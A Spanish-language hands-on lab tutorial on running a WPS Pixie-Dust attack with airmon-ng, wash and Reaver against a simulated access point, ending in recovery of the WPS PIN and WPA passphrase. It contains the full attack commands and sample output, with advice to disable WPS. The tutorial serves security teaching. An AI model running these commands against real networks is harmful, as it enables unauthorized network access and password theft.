LabEx
EntrarÚnete

Ejecutar un ataque WPS Pixie-Dust con Reaver

Beginner
Practicar Ahora

Introducción

Wi-Fi Protected Setup (WPS) es una función diseñada para facilitar la conexión de dispositivos a una red inalámbrica segura. Sin embargo, ciertas implementaciones de WPS contienen una vulnerabilidad crítica que puede ser explotada. El ataque Pixie-Dust se dirige a un fallo en la forma en que algunos puntos de acceso inalámbricos generan números aleatorios (nonces) durante el handshake de WPS. A diferencia de un ataque de fuerza bruta estándar que puede llevar horas, un ataque Pixie-Dust exitoso puede recuperar el PIN de WPS y la contraseña WPA/WPA2 en cuestión de segundos.

En este laboratorio, asumirá el rol de un pentester para aprender cómo funciona este ataque. Utilizará herramientas de la suite aircrack-ng y Reaver para identificar un objetivo vulnerable y ejecutar el ataque Pixie-Dust en un entorno simulado. Esto le proporcionará una comprensión práctica de esta potente técnica de hacking de Wi-Fi.

Identificar un objetivo vulnerable a Pixie-Dust a partir de un escaneo con wash

En este paso, comenzará escaneando las redes Wi-Fi cercanas que tengan WPS habilitado. Para ello, primero deberá poner su interfaz inalámbrica en "modo monitor", lo que le permitirá capturar todo el tráfico Wi-Fi en el aire, no solo el tráfico dirigido a su dispositivo. La herramienta airmon-ng se utiliza para este propósito.

Comencemos habilitando el modo monitor en la interfaz wlan0. En un escenario real, esto crea una nueva interfaz virtual, típicamente llamada wlan0mon.

sudo airmon-ng start wlan0

Debería ver una salida que confirma que el modo monitor se ha habilitado en una nueva interfaz llamada wlan0mon.

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k           Atheros Communications Inc. AR9271 802.11n

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
        (mac80211 station mode vif disabled for [phy0]wlan0)

Ahora que tiene una interfaz en modo monitor, puede usar la herramienta wash para escanear Puntos de Acceso (APs) con WPS habilitado. wash listará todas las redes WPS que detecte, junto con información importante sobre ellas.

Ejecute el siguiente comando para iniciar el escaneo en su interfaz monitor:

sudo wash -i wlan0mon

Después de unos momentos, wash mostrará una lista de redes.

Wash v1.6.5 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID               Ch  WPS Version  WPS Locked  ESSID
----------------------------------------------------------------
00:11:22:33:44:55   6   1.0          No          VulnerableAP
AA:BB:CC:DD:EE:FF   1   1.0          Yes         SecuredAP

A partir de esta salida, busque un objetivo. El objetivo ideal para un ataque Pixie-Dust es aquel en el que WPS Locked sea No. En nuestro caso, la red con el ESSID VulnerableAP y el BSSID 00:11:22:33:44:55 es nuestro objetivo. Tome nota de su BSSID, ya que lo necesitará en los siguientes pasos.

Iniciar Reaver con el parámetro -K o --pixie-dust

En este paso, nos prepararemos para lanzar el ataque utilizando Reaver. Reaver es una herramienta diseñada específicamente para llevar a cabo ataques de fuerza bruta contra los PINs de registro de WPS para recuperar las frases de contraseña WPA/WPA2.

Sin embargo, Reaver también tiene un modo especial para el ataque Pixie-Dust, mucho más rápido. Para habilitar este modo, debe usar el argumento de línea de comandos -K o --pixie-dust. Cuando se utiliza este argumento, Reaver intentará primero el ataque Pixie-Dust. Si el AP objetivo no es vulnerable, Reaver puede recurrir al método tradicional y más lento de fuerza bruta.

La estructura básica del comando Reaver para un ataque Pixie-Dust se ve así:

sudo reaver -i <monitor_interface> -b <target_bssid> -K

  • sudo reaver: Ejecuta la herramienta Reaver con privilegios de root.
  • -i <monitor_interface>: Especifica la interfaz de red que está en modo monitor (por ejemplo, wlan0mon).
  • -b <target_bssid>: Especifica el BSSID (dirección MAC) del punto de acceso objetivo.
  • -K: Este es el interruptor crucial que le indica a Reaver que realice un ataque Pixie-Dust.

Este paso trata sobre la comprensión de la estructura del comando. En el siguiente paso, combinará este conocimiento con la información recopilada del escaneo wash para ejecutar el comando completo.

Especificar el BSSID del objetivo y la interfaz monitor

Ahora es el momento de juntar todo y lanzar el ataque. Ha identificado un BSSID objetivo y conoce la estructura del comando para un ataque Pixie-Dust con Reaver.

Recuerde del Paso 1:

  • Interfaz Monitor: wlan0mon
  • BSSID Objetivo: 00:11:22:33:44:55

Ahora construirá el comando Reaver completo. También agregaremos la opción -vv (muy detallado). Esto es muy recomendable ya que muestra información detallada sobre el intercambio de WPS, incluyendo los nonces y hashes que son clave para el ataque Pixie-Dust. Esta salida es esencial para comprender cómo funciona el ataque.

Ejecute el siguiente comando en su terminal para iniciar el ataque:

sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv

Reaver ahora comenzará a comunicarse con el punto de acceso objetivo. Verá una serie de mensajes que indican el progreso del handshake de WPS. Dado que el objetivo es vulnerable en nuestro entorno simulado, el ataque será muy rápido.

Comprender cómo Pixie-Dust explota la generación débil de nonces

En este paso, analizará la salida del comando Reaver para comprender la mecánica del ataque Pixie-Dust. Este es un paso conceptual sin nuevos comandos que ejecutar.

Observe la salida detallada generada por Reaver en el paso anterior. Debería ver líneas prefijadas con [P], que muestran los valores capturados durante el intercambio de WPS:

...
[+] Sending M1 message
[+] Received M2 message
[P] E-S1: d3b25a26a713c1b2
[P] E-S2: 1a84a5e22236aebd
[P] PKE: c1...e2
[P] PKR: 3a...b1
[P] E-Hash1: 7d...c3
[P] E-Hash2: 9f...a5
[P] AuthKey: 8c...99
...

Esto es lo que está sucediendo:

  1. Handshake WPS: El cliente (Reaver) y el AP intercambian una serie de mensajes (M1, M2, etc.) para autenticarse.
  2. Intercambio de Nonces: Durante este handshake, intercambian "nonces" (E-S1 y E-S2), que se supone que son números grandes y aleatorios que se usan una sola vez.
  3. La Vulnerabilidad: La vulnerabilidad Pixie-Dust existe en los APs que generan estos nonces utilizando un algoritmo débil o predecible. En lugar de ser verdaderamente aleatorios, los nonces se derivan de o están estrechamente relacionados con secretos que se pueden usar para descifrar el PIN.
  4. Descifrado Offline: Reaver captura los dos nonces (E-S1, E-S2) y dos hashes (E-Hash1, E-Hash2) del AP. Con estos cuatro valores, tiene suficiente información para realizar un cálculo offline. Descifra el PIN por fuerza bruta en su máquina local sin necesidad de enviar más solicitudes al AP.

Debido a que el proceso de descifrado se realiza offline y explota la debilidad matemática en la generación de nonces, evita las defensas de limitación de velocidad del AP y encuentra el PIN correcto casi instantáneamente.

Observar la recuperación casi instantánea del PIN y la clave

En este paso final, observará el resultado exitoso del ataque. Después de que Reaver realice los cálculos offline, mostrará las credenciales recuperadas.

La parte final de la salida de Reaver del Paso 3 debería verse así:

...
[+] Pixie-Dust attack...
[+] 100.00% complete @ 2023-10-27 10:30:00 (0 seconds remaining)
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretPassword'
[+] AP SSID: 'VulnerableAP'

Analicemos la información recuperada:

  • WPS PIN: '12345670': Este es el PIN de 8 dígitos para la función WPS del router. Podría usar este PIN para conectar otros dispositivos habilitados para WPS a la red.
  • WPA PSK: 'SuperSecretPassword': Esta es la Clave Precompartida WPA/WPA2, que es la contraseña real de Wi-Fi para la red. Este es el objetivo final del ataque.
  • AP SSID: 'VulnerableAP': Esto confirma el nombre de la red que ha comprometido con éxito.

El aspecto más notable es la velocidad. Observe los "0 seconds remaining" (0 segundos restantes) en la salida. Todo el proceso, desde la iniciación del handshake hasta la recuperación de la clave, tomó solo unos segundos. Esto contrasta marcadamente con un ataque de fuerza bruta WPS tradicional, que podría llevar muchas horas o incluso ser imposible si el AP bloquea WPS después de varios intentos fallidos. Ahora ha demostrado con éxito la efectividad del ataque WPS Pixie-Dust.

Resumen

En este laboratorio, ejecutó con éxito un ataque WPS Pixie-Dust en un entorno simulado. Ha adquirido experiencia práctica con herramientas y conceptos esenciales de evaluación de seguridad Wi-Fi.

Aprendió a:

  • Usar airmon-ng para habilitar el modo monitor en una interfaz inalámbrica.
  • Usar wash para escanear e identificar puntos de acceso habilitados para WPS.
  • Comprender el propósito del flag -K (--pixie-dust) en Reaver.
  • Ejecutar un ataque Pixie-Dust dirigido utilizando reaver, especificando el BSSID del objetivo.
  • Interpretar la salida para comprender cómo el ataque explota la generación débil de nonces.
  • Observar la recuperación casi instantánea tanto del PIN WPS como de la PSK WPA.

Este laboratorio destaca una vulnerabilidad significativa en el mundo real. La defensa más efectiva contra este y otros ataques relacionados con WPS es deshabilitar completamente la función WPS en la configuración de administración de su router.